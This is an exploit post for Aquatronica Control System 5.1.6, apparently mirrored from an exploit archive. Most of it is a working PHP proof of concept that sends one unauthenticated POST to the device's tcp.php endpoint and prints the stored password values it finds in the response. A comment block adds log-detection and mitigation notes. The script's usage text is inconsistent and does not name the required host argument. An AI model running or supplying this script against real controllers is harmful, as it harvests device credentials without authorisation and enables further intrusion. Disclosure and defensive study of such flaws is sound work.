## https://sploitus.com/exploit?id=PACKETSTORM:181854
=============================================================================================================================================  
| # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |  
| # Vendor : https://www.aquatronica.com |  
=============================================================================================================================================  
  
poc :  
  
[+] Aquatronica Control System v 5.1.6 has a tcp.php endpoint that leaks passwords
  
[+] save as poc.php  
  
[+] Usage : C:\www\test>php 3.php poc.php  
  
[+] payload :   
  
<?php

/*
 * Proof of concept for the credential disclosure reported against the
 * tcp.php endpoint of Aquatronica Control System 5.1.6.
 *
 * What the script does:
 *   1. Takes the controller's host or IP from the single command-line
 *      argument ($argv[1]). The usage text printed below does not name
 *      that argument.
 *   2. Sends one HTTP POST to http://<host>/tcp.php with the form fields
 *      function_id=tcp_xml_request and command=WS_GET_NETWORK_CFG.
 *      No credentials, cookies or tokens are attached to the request.
 *   3. On HTTP 200, URL-decodes the body, reverses htmlspecialchars
 *      encoding, and prints the value of every pwd="..." attribute found.
 *
 * Notes for defenders:
 *   - Detection: a POST to /tcp.php whose body carries
 *     function_id=tcp_xml_request and command=WS_GET_NETWORK_CFG, sent by
 *     a client with no authenticated session, is the request to look for
 *     in web-server logs and network captures.
 *   - Mitigation: keep the controller's web interface reachable only from
 *     trusted networks, and change the passwords the device stores if the
 *     endpoint was exposed.
 *   - The advisory title says "hash"; this script prints whatever the
 *     pwd attributes contain, and nothing here shows whether those values
 *     are hashed or plaintext.
 */

// Exactly one argument after the script name is required.
if ($argc != 2) {
    echo "Usage: php aqua.php\n";
    exit(1);
}

$ip = $argv[1];

// Endpoint URL: the lower-cased program name becomes the .php file name.
$url = "http://$ip/" . strtolower("TCP") . ".php";

// Form body of the POST request: lower-cased function id, upper-cased
// command (presumably "get network configuration", going by its name).
$form = http_build_query([
    'function_id' => strtolower("TCP_XML_REQUEST"),
    'command' => strtoupper("ws_get_network_cfg"),
]);

// Issue the request with cURL and capture the body instead of printing it.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $url,
    CURLOPT_POST => 1,
    CURLOPT_POSTFIELDS => $form,
    CURLOPT_RETURNTRANSFER => true,
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code != 200) {
    // Any status other than 200 (including 0 on a failed transfer) is
    // reported and the script ends.
    echo "Dry season! HTTP Code: $http_code\n";
} else {
    // Undo URL encoding first, then HTML special-character encoding.
    $body = htmlspecialchars_decode(urldecode($response));

    // Collect the value of every pwd="..." attribute in the decoded body.
    preg_match_all('/pwd="([^"]+)"/', $body, $matches);

    if (empty($matches[1])) {
        echo "No passwords found.\n";
    } else {
        foreach ($matches[1] as $password) {
            echo " $password\n";
            sleep(1); // one-second pause between printed values
        }
    }
}
?>
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================